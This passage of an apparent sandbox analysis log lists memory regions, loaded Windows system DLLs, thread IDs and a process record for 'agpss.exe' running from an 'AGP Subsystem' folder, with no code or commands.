filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 2782
start_va = 0x7fef83e0000
end_va = 0x7fef83f6fff
monitored = 0
entry_point = 0x7fef83e1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 2783
start_va = 0x2130000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2784
start_va = 0x24b0000
end_va = 0x253ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 2785
start_va = 0x25a0000
end_va = 0x261ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 2786
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 2787
start_va = 0x7fefc5d0000
end_va = 0x7fefc5e1fff
monitored = 0
entry_point = 0x7fefc5d1060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 2788
start_va = 0x9d0000
end_va = 0x9d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 2789
start_va = 0x7fefb400000
end_va = 0x7fefb413fff
monitored = 0
entry_point = 0x7fefb4016b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 2790
start_va = 0x18a0000
end_va = 0x191ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018a0000"
filename = ""
Region:
id = 2791
start_va = 0x1920000
end_va = 0x192ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001920000"
filename = ""
Region:
id = 2792
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 2793
start_va = 0x7fefb500000
end_va = 0x7fefb573fff
monitored = 0
entry_point = 0x7fefb5066f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 2794
start_va = 0x7fefa9c0000
end_va = 0x7fefa9d0fff
monitored = 0
entry_point = 0x7fefa9c16ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2795
start_va = 0x7fefb490000
end_va = 0x7fefb4fafff
monitored = 0
entry_point = 0x7fefb4d4344
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 2796
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2797
start_va = 0x2960000
end_va = 0x29dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 2798
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 2799
start_va = 0x7fefa940000
end_va = 0x7fefa957fff
monitored = 0
entry_point = 0x7fefa941bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2800
start_va = 0x2ac0000
end_va = 0x2b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 2801
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 2802
start_va = 0x7fefb470000
end_va = 0x7fefb489fff
monitored = 0
entry_point = 0x7fefb483fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 2848
start_va = 0x7fef7570000
end_va = 0x7fef757dfff
monitored = 0
entry_point = 0x7fef7575500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 2849
start_va = 0x7fef6d30000
end_va = 0x7fef6e5bfff
monitored = 0
entry_point = 0x7fef6de0ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 2850
start_va = 0x2b90000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 2851
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 2853
start_va = 0x7fef6cc0000
end_va = 0x7fef6d21fff
monitored = 0
entry_point = 0x7fef6cfbd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 2855
start_va = 0x7fef7b80000
end_va = 0x7fef7c52fff
monitored = 0
entry_point = 0x7fef7bf8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2856
start_va = 0x7fef7b50000
end_va = 0x7fef7b76fff
monitored = 0
entry_point = 0x7fef7b511a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2873
start_va = 0x2c10000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c10000"
filename = ""
Region:
id = 2877
start_va = 0x2c40000
end_va = 0x2cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c40000"
filename = ""
Region:
id = 2878
start_va = 0x2cc0000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cc0000"
filename = ""
Region:
id = 2879
start_va = 0x7fef6b30000
end_va = 0x7fef6b42fff
monitored = 0
entry_point = 0x7fef6b31d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2880
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 2881
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2882
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2883
start_va = 0x7fefc910000
end_va = 0x7fefc96afff
monitored = 0
entry_point = 0x7fefc916940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2884
start_va = 0x2d40000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d40000"
filename = ""
Region:
id = 2885
start_va = 0x2dd0000
end_va = 0x2e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002dd0000"
filename = ""
Region:
id = 2886
start_va = 0x2e60000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e60000"
filename = ""
Region:
id = 2887
start_va = 0x7fefa470000
end_va = 0x7fefa477fff
monitored = 0
entry_point = 0x7fefa471414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2888
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 2903
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2904
start_va = 0x7fef6b00000
end_va = 0x7fef6b20fff
monitored = 0
entry_point = 0x7fef6b103b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 2905
start_va = 0x7fef6aa0000
end_va = 0x7fef6af9fff
monitored = 0
entry_point = 0x7fef6addde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 2940
start_va = 0x2f90000
end_va = 0x300ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 2941
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 2944
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 2945
start_va = 0x30a0000
end_va = 0x311ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Region:
id = 2946
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 2947
start_va = 0x3120000
end_va = 0x331ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003120000"
filename = ""
Region:
id = 2949
start_va = 0x7fef7a70000
end_va = 0x7fef7a7bfff
monitored = 0
entry_point = 0x7fef7a7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2950
start_va = 0x3320000
end_va = 0x341ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003320000"
filename = ""
Region:
id = 2951
start_va = 0x2d50000
end_va = 0x2dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 2952
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 2953
start_va = 0x7fef5ab0000
end_va = 0x7fef5b64fff
monitored = 0
entry_point = 0x7fef5b2cf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 2954
start_va = 0x7fef6ec0000
end_va = 0x7fef6ed1fff
monitored = 0
entry_point = 0x7fef6ec89d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 2955
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009e0000"
filename = ""
Region:
id = 2956
start_va = 0x1c90000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c90000"
filename = ""
Region:
id = 2957
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 2958
start_va = 0x29f0000
end_va = 0x2a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 2959
start_va = 0x3530000
end_va = 0x35affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003530000"
filename = ""
Region:
id = 2960
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 2961
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 2962
start_va = 0x3620000
end_va = 0x369ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003620000"
filename = ""
Region:
id = 2963
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 2964
start_va = 0x3450000
end_va = 0x34cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003450000"
filename = ""
Region:
id = 2965
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 2972
start_va = 0x7fef5330000
end_va = 0x7fef53a0fff
monitored = 0
entry_point = 0x7fef53751d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 2973
start_va = 0x37d0000
end_va = 0x384ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037d0000"
filename = ""
Region:
id = 2974
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 2977
start_va = 0x3880000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003880000"
filename = ""
Region:
id = 2978
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 2980
start_va = 0x3710000
end_va = 0x378ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003710000"
filename = ""
Region:
id = 2981
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 2982
start_va = 0x3970000
end_va = 0x39effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003970000"
filename = ""
Region:
id = 2983
start_va = 0x3a00000
end_va = 0x3a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 2984
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 2985
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 3317
start_va = 0xef0000
end_va = 0xf0bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 3318
start_va = 0x1020000
end_va = 0x1035fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001020000"
filename = ""
Region:
id = 3319
start_va = 0xa80000
end_va = 0xa83fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a80000"
filename = ""
Region:
id = 3320
start_va = 0x24b0000
end_va = 0x252ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 3321
start_va = 0x2530000
end_va = 0x253ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 3322
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Thread:
id = 53
os_tid = 0x460
Thread:
id = 54
os_tid = 0x438
Thread:
id = 55
os_tid = 0x434
Thread:
id = 56
os_tid = 0x138
Thread:
id = 57
os_tid = 0x244
Thread:
id = 58
os_tid = 0x430
Thread:
id = 59
os_tid = 0x42c
Thread:
id = 60
os_tid = 0x420
Thread:
id = 61
os_tid = 0x148
Thread:
id = 62
os_tid = 0x3e4
Thread:
id = 63
os_tid = 0x3cc
Thread:
id = 64
os_tid = 0x3b4
Thread:
id = 65
os_tid = 0x3b0
Thread:
id = 66
os_tid = 0x364
Thread:
id = 67
os_tid = 0x360
Thread:
id = 68
os_tid = 0x35c
Thread:
id = 69
os_tid = 0x358
Thread:
id = 70
os_tid = 0x354
Thread:
id = 71
os_tid = 0x350
Thread:
id = 72
os_tid = 0x558
Thread:
id = 73
os_tid = 0x560
Thread:
id = 75
os_tid = 0x640
Thread:
id = 76
os_tid = 0x658
Thread:
id = 77
os_tid = 0x65c
Thread:
id = 78
os_tid = 0x670
Thread:
id = 79
os_tid = 0x674
Thread:
id = 80
os_tid = 0x6ac
Thread:
id = 81
os_tid = 0x6b0
Thread:
id = 82
os_tid = 0x6b8
Thread:
id = 83
os_tid = 0x6d8
Thread:
id = 84
os_tid = 0x6e4
Thread:
id = 85
os_tid = 0x720
Thread:
id = 86
os_tid = 0x728
Thread:
id = 88
os_tid = 0x738
Thread:
id = 89
os_tid = 0x744
Thread:
id = 90
os_tid = 0x74c
Thread:
id = 94
os_tid = 0x78c
Thread:
id = 95
os_tid = 0x790
Thread:
id = 96
os_tid = 0x578
Thread:
id = 97
os_tid = 0x5ac
Thread:
id = 98
os_tid = 0x1bc
Thread:
id = 99
os_tid = 0x15c
Thread:
id = 100
os_tid = 0x130
Thread:
id = 101
os_tid = 0x114
Thread:
id = 102
os_tid = 0x504
Thread:
id = 103
os_tid = 0x5f8
Thread:
id = 104
os_tid = 0x5a4
Thread:
id = 105
os_tid = 0x614
Thread:
id = 106
os_tid = 0x604
Thread:
id = 129
os_tid = 0x2e4
Process:
id = "10"
image_name = "agpss.exe"
filename = "c:\\program files (x86)\\agp subsystem\\agpss.exe"
page_root = "0x19775000"
os_pid = "0x72c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "modified_file"
parent_id = "4"
os_parent_pid = "0x684"
cmd_line = "\"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\" "
cur_dir = "C:\\Windows\\SysWOW64\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2803
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2804
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2805
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2806
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2807
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2808
start_va = 0x90000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2809
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2810
start_va = 0xee0000
end_va = 0xfa9fff
monitored = 1
entry_point = 0xfa4c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2811
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2812
start_va = 0x77490000
end_va = 0x7760ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2813
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2814
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2815
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2816
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2817
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2818
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2819
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2820
start_va = 0x390000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2821
start_va = 0x73c20000
end_va = 0x73c5efff
monitored = 0
entry_point = 0x73c4e088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2822
start_va = 0x73bc0000
end_va = 0x73c1bfff
monitored = 0
entry_point = 0x73bff9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2823
start_va = 0x73bb0000
end_va = 0x73bb7fff
monitored = 0
entry_point = 0x73bb20f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2824
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2825
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2826
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2827
start_va = 0x77190000
end_va = 0x772aefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077190000"
filename = ""
Region:
id = 2828
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2829
start_va = 0x77090000
end_va = 0x77189fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077090000"
filename = ""
Region:
id = 2830
start_va = 0x590000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2831
start_va = 0x73a90000
end_va = 0x73ad9fff
monitored = 1
entry_point = 0x73a92e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 2832
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2833
start_va = 0x75160000
end_va = 0x751a6fff
monitored = 0
entry_point = 0x751674c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2834
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2835
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2836
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2837
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2838
start_va = 0x810000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2839
start_va = 0x9c0000
end_va = 0xbaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009c0000"
filename = ""
Region:
id = 2840
start_va = 0x76a50000
end_va = 0x76aeffff
monitored = 0
entry_point = 0x76a649e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2841
start_va = 0x75670000
end_va = 0x7571bfff
monitored = 0
entry_point = 0x7567a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2842
start_va = 0x75500000
end_va = 0x75518fff
monitored = 0
entry_point = 0x75504975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2843
start_va = 0x75310000
end_va = 0x753fffff
monitored = 0
entry_point = 0x75320569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2844
start_va = 0x74fe0000
end_va = 0x7503ffff
monitored = 0
entry_point = 0x74ffa3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2845
start_va = 0x74fd0000
end_va = 0x74fdbfff
monitored = 0
entry_point = 0x74fd10e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2846
start_va = 0xbb0000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 2847
start_va = 0x73930000
end_va = 0x739bcfff
monitored = 1
entry_point = 0x73942860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2852
start_va = 0x73a80000
end_va = 0x73a82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2857
start_va = 0x751e0000
end_va = 0x75236fff
monitored = 0
entry_point = 0x751f9ba6
region_type = mapped_file
name = "shlwapi.dll"
